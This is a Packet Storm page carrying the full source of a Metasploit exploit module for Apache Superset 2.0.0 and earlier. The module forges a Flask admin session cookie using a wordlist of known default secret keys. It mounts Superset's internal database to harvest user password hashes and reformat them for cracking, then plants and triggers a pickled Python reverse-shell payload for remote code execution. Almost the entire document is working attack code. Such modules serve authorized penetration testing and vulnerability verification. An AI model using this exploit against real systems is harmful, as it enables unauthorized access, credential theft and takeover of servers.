exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Apache Superset 2.0.0 Remote Code Execution

Apache Superset 2.0.0 Remote Code Execution
Posted Oct 13, 2023
Authored by h00die, Spencer McIntyre, Naveen Sunkavally, paradoxis | Site metasploit.com

Apache Superset versions 2.0.0 and below utilize Flask with a known default secret key which is used to sign HTTP cookies. These cookies can therefore be forged. If a user is able to login to the site, they can decode the cookie, set their user_id to that of an administrator, and re-sign the cookie. This valid cookie can then be used to login as the targeted user. From there the Superset database is mounted, and credentials are pulled. A dashboard is then created. Lastly a pickled python payload can be set for that dashboard within Superset's database which will trigger the remote code execution. An attempt to clean up ALL of the dashboard key values and reset them to their previous values happens during the cleanup phase.

tags | exploit, remote, web, code execution, python
advisories | CVE-2023-27524, CVE-2023-37941, CVE-2023-39265
SHA-256 | 0cf3211c0a88b94f22c56bd68535a69b15419a4e9c97ce50b1d180e75e44b6be

Apache Superset 2.0.0 Remote Code Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Apache Superset Signed Cookie RCE',
'Description' => %q{
Apache Superset versions <= 2.0.0 utilize Flask with a known default secret key which is used to sign HTTP cookies.
These cookies can therefore be forged. If a user is able to login to the site, they can decode the cookie, set their user_id to that
of an administrator, and re-sign the cookie. This valid cookie can then be used to login as the targeted user. From there the
Superset database is mounted, and credentials are pulled. A dashboard is then created. Lastly a pickled python payload can be
set for that dashboard within Superset's database which will trigger the RCE.

An attempt to clean up ALL of the dashboard key values and reset them to their previous values happens during the cleanup phase.
},
'License' => MSF_LICENSE,
'Author' => [
'h00die', # MSF module
'paradoxis', # original flask-unsign tool
'Spencer McIntyre', # MSF flask-unsign library
'Naveen Sunkavally' # horizon3.ai writeup and cve discovery
],
'References' => [
['URL', 'https://github.com/Paradoxis/Flask-Unsign'],
['URL', 'https://vulcan.io/blog/cve-2023-27524-in-apache-superset-what-you-need-to-know/'],
['URL', 'https://www.horizon3.ai/cve-2023-27524-insecure-default-configuration-in-apache-superset-leads-to-remote-code-execution/'],
['URL', 'https://www.horizon3.ai/apache-superset-part-ii-rce-credential-harvesting-and-more/'],
['URL', 'https://github.com/horizon3ai/CVE-2023-27524/blob/main/CVE-2023-27524.py'],
['EDB', '51447'],
['CVE', '2023-27524'], # flask cookie
['CVE', '2023-37941'], # rce
['CVE', '2023-39265'] # mount superset's internal database
],
'Platform' => ['python'],
'Privileged' => false,
'Arch' => ARCH_PYTHON,
'Targets' => [
[ 'Automatic Target', {}]
],
'DefaultOptions' => {
'PAYLOAD' => 'python/meterpreter/reverse_tcp'
},
'DisclosureDate' => '2023-09-06',

'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [CONFIG_CHANGES],
'RelatedModules' => ['auxiliary/gather/apache_superset_cookie_sig_priv_esc']
}
)
)
register_options(
[
Opt::RPORT(8088),
OptString.new('USERNAME', [true, 'The username to authenticate as', nil]),
OptString.new('PASSWORD', [true, 'The password for the specified username', nil]),
OptInt.new('ADMIN_ID', [true, 'The ID of an admin account', 1]),
OptString.new('TARGETURI', [ true, 'Relative URI of Apache Superset installation', '/']),
OptPath.new('SECRET_KEYS_FILE', [
false, 'File containing secret keys to try, one per line',
File.join(Msf::Config.data_directory, 'wordlists', 'superset_secret_keys.txt')
]),
OptString.new('DATABASE', [true, 'The superset database location', '/app/superset_home/superset.db'])
]
)
end

def check
res = send_request_cgi!({
'uri' => normalize_uri(target_uri.path, 'login/')
})
return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
return Exploit::CheckCode::Unknown("#{peer} - Unexpected response code (#{res.code})") unless res.code == 200
return Exploit::CheckCode::Safe("#{peer} - Unexpected response, version_string not detected") unless res.body.include? 'version_string'
unless res.body =~ /"version_string": "([\d.]+)"/
return Exploit::CheckCode::Safe("#{peer} - Unexpected response, unable to determine version_string")
end

version = Rex::Version.new(Regexp.last_match(1))
if version < Rex::Version.new('2.0.1') && version >= Rex::Version.new('1.4.1')
Exploit::CheckCode::Appears("Apache Supset #{version} is vulnerable")
else
Exploit::CheckCode::Safe("Apache Supset #{version} is NOT vulnerable")
end
end

def get_secret_key(cookie)
File.open(datastore['SECRET_KEYS_FILE'], 'rb').each do |secret|
secret = secret.strip
vprint_status("#{peer} - Checking secret key: #{secret}")

unescaped_secret = Rex::Text.dehex(secret.gsub('\\', '\\').gsub('\\n', "\n").gsub('\\t', "\t"))
unless Msf::Exploit::Remote::HTTP::FlaskUnsign::Session.valid?(cookie, unescaped_secret)
vprint_bad("#{peer} - Incorrect secret key: #{secret}")
next
end

print_good("#{peer} - Found secret key: #{secret}")
return secret
end
nil
end

def validate_cookie(decoded_cookie, secret_key)
print_status("#{peer} - Attempting to resign with key: #{secret_key}")
encoded_cookie = Msf::Exploit::Remote::HTTP::FlaskUnsign::Session.sign(decoded_cookie, secret_key)

print_status("#{peer} - New signed cookie: #{encoded_cookie}")
cookie_jar.clear
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'api', 'v1', 'me', '/'),
'cookie' => "session=#{encoded_cookie};",
'keep_cookies' => true
)
fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
if res.code == 401
print_bad("#{peer} - Cookie not accepted")
return nil
end
data = res.get_json_document
print_good("#{peer} - Cookie validated to user: #{data['result']['username']}")
return encoded_cookie
end

def get_csrf_token
vprint_status('Grabbing CSRF token')
res = send_request_cgi!({
'uri' => normalize_uri(target_uri.path, 'login/'),
'keep_cookies' => true
})
fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response code (#{res.code})") unless res.code == 200

fail_with(Failure::NotFound, 'Unable to determine csrf token') unless res.body =~ /name="csrf_token" type="hidden" value="([\w.-]+)">/

@csrf_token = Regexp.last_match(1)
vprint_status("#{peer} - CSRF Token: #{@csrf_token}")
end

def login_and_priv_esc
get_csrf_token

print_status("#{peer} - Attempting login")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'login/'),
'keep_cookies' => true,
'method' => 'POST',
'ctype' => 'application/x-www-form-urlencoded',
'vars_post' => {
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD'],
'csrf_token' => @csrf_token
}
})
fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::NoAccess, "#{peer} - Failed login") if res.body.include? 'Sign In'

cookie = res.get_cookies.to_s
print_good("#{peer} - Logged in Cookie: #{cookie}")

# get the cookie value and strip off anything else
cookie = cookie.split('=')[1].gsub(';', '')

secret_key = get_secret_key(cookie)
fail_with(Failure::NotFound, 'Unable to find secret key') if secret_key.nil?

decoded_cookie = Msf::Exploit::Remote::HTTP::FlaskUnsign::Session.decode(cookie)
decoded_cookie['user_id'] = datastore['ADMIN_ID']
print_status("#{peer} - Modified cookie: #{decoded_cookie}")
@admin_cookie = validate_cookie(decoded_cookie, secret_key)
fail_with(Failure::NoAccess, "#{peer} - Unable to sign cookie with a valid secret") if @admin_cookie.nil?
end

def set_query_latest_query_id
vprint_status('Setting latest query id')
@client_id = Rex::Text.rand_text_alphanumeric(8, 12)
data = Rex::MIME::Message.new
data.add_part('"' + @client_id + '"', nil, nil, 'form-data; name="latest_query_id"')

res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'tabstateview', @tab_id),
'keep_cookies' => true,
'cookie' => "session=#{@admin_cookie};",
'method' => 'PUT',
'data' => data.to_s,
'headers' => {
'Accept' => 'application/json',
'X-CSRFToken' => @csrf_token
}
)
fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response code (#{res.code})") unless res.code == 200
end

def transform_hash(hash)
# Some background on transforming this hash:
# If we use python hashlib to generate the hash, it matches
# example output for password 'admin': $pbkdf2-sha256$260000$CXsb59tSLZm9ABBN$b3ebe68c694857464a5754a9ddd4ddadc9ff8bd093ab13d9d2496f7b81eb79e5
# hashlib: >>> pbkdf2_hmac('sha256', b'admin', b'CXsb59tSLZm9ABBN', our_app_iters).hex()
# 'b3ebe68c694857464a5754a9ddd4ddadc9ff8bd093ab13d9d2496f7b81eb79e5'
# however, JTR doesn't like this: No password hashes loaded (see FAQ)
# hashid also doesn't: [+] Unknown hash

# the basis of this is the hex() makes it 64 characters, and we need 43 characters to be a real hash
# https://hashcat.net/forum/thread-7715.html is the same issue
# the solution is to take the value, unhex it, base64 it, remove =, and sub '+' for '.'. This is the same for the salt, except for unhex.

# example output: $pbkdf2-sha256$260000$CXsb59tSLZm9ABBN$b3ebe68c694857464a5754a9ddd4ddadc9ff8bd093ab13d9d2496f7b81eb79e5
# needs transform to: $pbkdf2-sha256$260000$Q1hzYjU5dFNMWm05QUJCTg$s.vmjGlIV0ZKV1Sp3dTdrcn/i9CTqxPZ0klve4HreeU

# to get there: salt: base64, remove =, sub '+' for '.'
# python code: base64.b64encode(b'CXsb59tSLZm9ABBN').decode('utf8').replace('=','').replace('+','.')
# python output: Q1hzYjU5dFNMWm05QUJCTg

# to get there: hash: unhex, base64, remove =, sub '+' for '.'
# python code: base64.b64encode(binascii.unhexlify(b'b3ebe68c694857464a5754a9ddd4ddadc9ff8bd093ab13d9d2496f7b81eb79e5')).decode('utf8').replace('=','').replace('+','.')
# python output: s.vmjGlIV0ZKV1Sp3dTdrcn/i9CTqxPZ0klve4HreeU
header = hash.split('$')[0] # contains algorithm, iterations
header = header.sub('pbkdf2:sha256:', '$pbkdf2-sha256$')
salt = hash.split('$')[1]
salt = Base64.strict_encode64(salt).delete('=').tr('+', '.')
hash = hash.split('$')[2]
hash = Base64.strict_encode64([hash].pack('H*')).delete('=').tr('+', '.')
jtr_password = [header, salt, hash].join('$')
jtr_password
end

def mount_internal_database
# use cve-2023-39265 bypass to mount superset's internal sqlite db
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'api', 'v1', 'database/'),
'method' => 'POST',
'cookie' => "session=#{@admin_cookie};",
'keep_cookies' => true,
'ctype' => 'application/json',
'headers' => {
'Accept' => 'application/json',
'X-CSRFToken' => @csrf_token
},
'data' => {
'engine' => 'sqlite',
'configuration_method' => 'sqlalchemy_form',
'catalog' => [{ 'name' => '', 'value' => '' }],
'sqlalchemy_uri' => "sqlite+pysqlite:///#{datastore['DATABASE']}",
'expose_in_sqllab' => true,
'database_name' => Rex::Text.rand_text_alphanumeric(6, 12),
'allow_ctas' => true,
'allow_cvas' => true,
'allow_dml' => true,
'allow_multi_schema_metadata_fetch' => true,
'extra_json' => {
'cost_estimate_enabled' => true,
'allows_virtual_table_explore' => true
},
'extra' => {
'cost_estimate_enabled' => true,
'allows_virtual_table_explore' => true,
'metadata_params' => {},
'engine_params' => {},
'schemas_allowed_for_file_upload' => []
}.to_json
}.to_json
)

fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Failed to mount the internal database: #{datastore['DATABASE']}") if res.code == 422
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response code (#{res.code})") unless res.code == 201

j = res.get_json_document
@db_id = j['id']
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to find 'id' field in response data: #{j}") if @db_id.nil?
print_good("Successfully created db mapping with id: #{@db_id}")

# create new query tab
vprint_status('Creating new sqllab tab')
data = Rex::MIME::Message.new
data.add_part('{"title":"' + Rex::Text.rand_text_alphanumeric(6, 12) + '","dbId":' + @db_id.to_s + ',"schema":null,"autorun":false,"sql":"SELECT ...","queryLimit":1000}', nil, nil, 'form-data; name="queryEditor"')

res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'tabstateview/'),
'method' => 'POST',
'cookie' => "session=#{@admin_cookie};",
'keep_cookies' => true,
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'headers' => {
'Accept' => 'application/json',
'X-CSRFToken' => @csrf_token
},
'data' => data.to_s
)

fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response code (#{res.code})") unless res.code == 200

j = res.get_json_document
@tab_id = j['id']
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to find 'id' field in response data: #{j}") if @tab_id.nil?
print_good("Using tab: #{@tab_id}")

# tell it we're about to submit a new query
set_query_latest_query_id

# harvest creds
vprint_status('Harvesting superset user creds')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'superset', 'sql_json/'),
'method' => 'POST',
'cookie' => "session=#{@admin_cookie};",
'keep_cookies' => true,
'ctype' => 'application/json',
'headers' => {
'Accept' => 'application/json',
'X-CSRFToken' => @csrf_token
},
'data' => {
'client_id' => @client_id,
'database_id' => @db_id,
'json' => true,
'runAsync' => false,
'schema' => 'main',
'sql' => 'SELECT username,password from ab_user;',
'sql_editor_id' => '1',
'tab' => 'Untitled Query 1',
'tmp_table_name' => '',
'select_as_cta' => false,
'ctas_method' => 'TABLE',
'queryLimit' => 1000,
'expand_data' => true
}.to_json
)

fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response code (#{res.code})") unless res.code == 200

creds_table = Rex::Text::Table.new(
'Header' => 'Superset Creds',
'Indent' => 2,
'Columns' =>
[
'Username',
'Password'
]
)

j = res.get_json_document
j['data'].each do |cred|
jtr_password = transform_hash(cred['password'])
creds_table << [cred['username'], jtr_password]

create_credential({
workspace_id: myworkspace_id,
origin_type: :service,
module_fullname: fullname,
username: cred['username'],
private_type: :nonreplayable_hash,
jtr_format: Metasploit::Framework::Hashes.identify_hash(jtr_password),
private_data: jtr_password,
service_name: 'Apache Superset',
address: datastore['RHOST'],
port: datastore['RPORT'],
protocol: 'tcp',
status: Metasploit::Model::Login::Status::UNTRIED
})
end

print_good(creds_table.to_s)
end

def rce_implant
# create new dashboard
vprint_status('Creating new dashboard')
res = send_request_cgi(
'keep_cookies' => true,
'cookie' => "session=#{@admin_cookie};",
'uri' => normalize_uri(target_uri.path, 'dashboard', 'new/')
)

fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response code (#{res.code})") unless res.code == 302

res.headers['location'] =~ %r{dashboard/(\d+)/}
@dashboard_id = Regexp.last_match(1)
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to detect dashboard ID from location header: #{res.headers['location']}") if @dashboard_id.nil?
print_good("New Dashboard id: #{@dashboard_id}")

# get permalink so we can trigger it later for payload execution
vprint_status('Grabbing permalink to new dashboard to trigger payload later')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'api', 'v1', 'dashboard', @dashboard_id, 'permalink'),
'method' => 'POST',
'cookie' => "session=#{@admin_cookie};",
'keep_cookies' => true,
'ctype' => 'application/json',
'headers' => {
'Accept' => 'application/json',
'X-CSRFToken' => @csrf_token
},
'data' => {
filterState: {},
urlParams: []
}.to_json
)
permalink_key = res.get_json_document['key']
print_good("Dashboard permalink key: #{permalink_key}")

# grab the default values so we can unset them later
vprint_status('Grabbing values to reset later')
set_query_latest_query_id
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'superset', 'sql_json/'),
'method' => 'POST',
'cookie' => "session=#{@admin_cookie};",
'keep_cookies' => true,
'ctype' => 'application/json',
'headers' => {
'Accept' => 'application/json',
'X-CSRFToken' => @csrf_token
},
'data' => {
'client_id' => @client_id,
'database_id' => @db_id,
'json' => true,
'runAsync' => false,
'schema' => 'main',
'sql' => "SELECT id,value from key_value where resource='dashboard_permalink';",
'sql_editor_id' => '1',
'tab' => 'Untitled Query 1',
'tmp_table_name' => '',
'select_as_cta' => false,
'ctas_method' => 'TABLE',
'queryLimit' => 1000,
'expand_data' => true
}.to_json
)

fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response code (#{res.code})") unless res.code == 200

# in the GUI we would get [bytes] (even in the JSON response) so this isn't very convenient. We can use the CSV
# output to grab the correct values.
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'superset', 'csv', @client_id),
'cookie' => "session=#{@admin_cookie};",
'keep_cookies' => true
)
fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response code (#{res.code})") unless res.code == 200

@values_to_reset = CSV.parse(res.body)

# tell it we're about to submit a new query
set_query_latest_query_id

pickled = Rex::Text.to_hex(Msf::Util::PythonDeserialization.payload(:py3_exec, payload.encoded))
pickled = pickled.gsub('\x', '') # we only need a beginning \x not every character for this format

vprint_status('Uploading payload')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'superset', 'sql_json/'),
'method' => 'POST',
'cookie' => "session=#{@admin_cookie};",
'keep_cookies' => true,
'ctype' => 'application/json',
'headers' => {
'Accept' => 'application/json',
'X-CSRFToken' => @csrf_token
},
'data' => {
'client_id' => @client_id,
'database_id' => @db_id,
'json' => true,
'runAsync' => false,
'schema' => 'main',
'sql' => "UPDATE key_value set value=X'#{pickled}' where resource='dashboard_permalink';", # the dashboard ID doesn't necessarily correspond to the ID in this table, so we just have to overwrite them all
'sql_editor_id' => '1',
'tab' => 'Untitled Query 1',
'tmp_table_name' => '',
'select_as_cta' => false,
'ctas_method' => 'TABLE',
'queryLimit' => 1000,
'expand_data' => true
}.to_json
)

fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response code (#{res.code})") unless res.code == 200

print_status('Triggering payload')
res = send_request_cgi(
'keep_cookies' => true,
'cookie' => "session=#{@admin_cookie};",
'uri' => normalize_uri(target_uri.path, 'superset', 'dashboard', 'p', permalink_key, '/')
)
# we go through some permalink hell here
until res.nil? || res.headers['Location'].nil?
res = send_request_cgi(
'keep_cookies' => true,
'cookie' => "session=#{@admin_cookie};",
'uri' => res.headers['Location']
)
end

# 404 error and we win.
# log item: 172.17.0.1 - - [14/Sep/2023:17:37:25 +0000] "GET /superset/dashboard/p/MzABePa5XYd/ HTTP/1.1" 404 38 "-" "Mozilla/5.0 (iPad; CPU OS 16_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Mobile/15E148 Safari/604.1"
end

def exploit
@db_id = nil
@csrf_token = nil
@tab_id = nil
@dashboard_id = nil
vprint_status('Attempting login')
login_and_priv_esc
vprint_status('Attempting to pull user creds from db')
mount_internal_database
vprint_status('Attempting RCE')
rce_implant
end

def cleanup
super

# We didn't know the previous values, so just blank out XXX
unless (@client_id.nil? || @csrf_token.nil? || @db_id.nil? || @values_to_reset.nil?)
print_status('Unsetting RCE Payloads')
@values_to_reset.each do |row|
next if row[0] == 'id' # headers

vprint_status("Restoring row ID #{row[0]}")

set_query_latest_query_id
is_binary = false
if (row[1].starts_with?("b'") && row[1].ends_with?("'"))
row[1] = row[1][2..-2] # remove encoding and substring marks
row[1] = Rex::Text.to_hex(row[1])
row[1] = row[1].gsub('\x', '') # we only need a beginning \x not every character for this format
is_binary = true
end

res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'superset', 'sql_json/'),
'method' => 'POST',
'cookie' => "session=#{@admin_cookie};",
'keep_cookies' => true,
'ctype' => 'application/json',
'headers' => {
'Accept' => 'application/json',
'X-CSRFToken' => @csrf_token
},
'data' => {
'client_id' => @client_id,
'database_id' => @db_id,
'json' => true,
'runAsync' => false,
'schema' => 'main',
'sql' => "UPDATE key_value set value=#{is_binary ? 'X' : ''}'#{row[1]}' where id='#{row[0]}';",
'sql_editor_id' => '1',
'tab' => 'Untitled Query 1',
'tmp_table_name' => '',
'select_as_cta' => false,
'ctas_method' => 'TABLE',
'queryLimit' => 1000,
'expand_data' => true
}.to_json
)
if res && res.code == 200
vprint_good('Successfully restored')
else
vprint_bad("Unable to reset value: #{row[1]}")
end
end
end

# delete dashboard
unless @dashboard_id.nil?
print_status('Deleting dashboard')
send_request_cgi(
'keep_cookies' => true,
'cookie' => "session=#{@admin_cookie};",
'uri' => normalize_uri(target_uri.path, 'api', 'v1', 'dashboard', @dashboard_id),
'method' => 'DELETE',
'headers' => {
'Accept' => 'application/json',
'X-CSRFToken' => @csrf_token
}
)
end

# delete sqllab tab
unless @tab_id.nil?
print_status('Deleting sqllab tab')
send_request_cgi(
'keep_cookies' => true,
'cookie' => "session=#{@admin_cookie};",
'uri' => normalize_uri(target_uri.path, 'tabstateview', @tab_id),
'method' => 'DELETE',
'headers' => {
'Accept' => 'application/json',
'X-CSRFToken' => @csrf_token
}
)
end

# delete mapping to stock database
unless @db_id.nil?
print_status('Deleting database mapping')
send_request_cgi(
'keep_cookies' => true,
'cookie' => "session=#{@admin_cookie};",
'uri' => normalize_uri(target_uri.path, 'api', 'v1', 'database', @db_id),
'method' => 'DELETE',
'headers' => {
'Accept' => 'application/json',
'X-CSRFToken' => @csrf_token
}
)
end
end
end
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close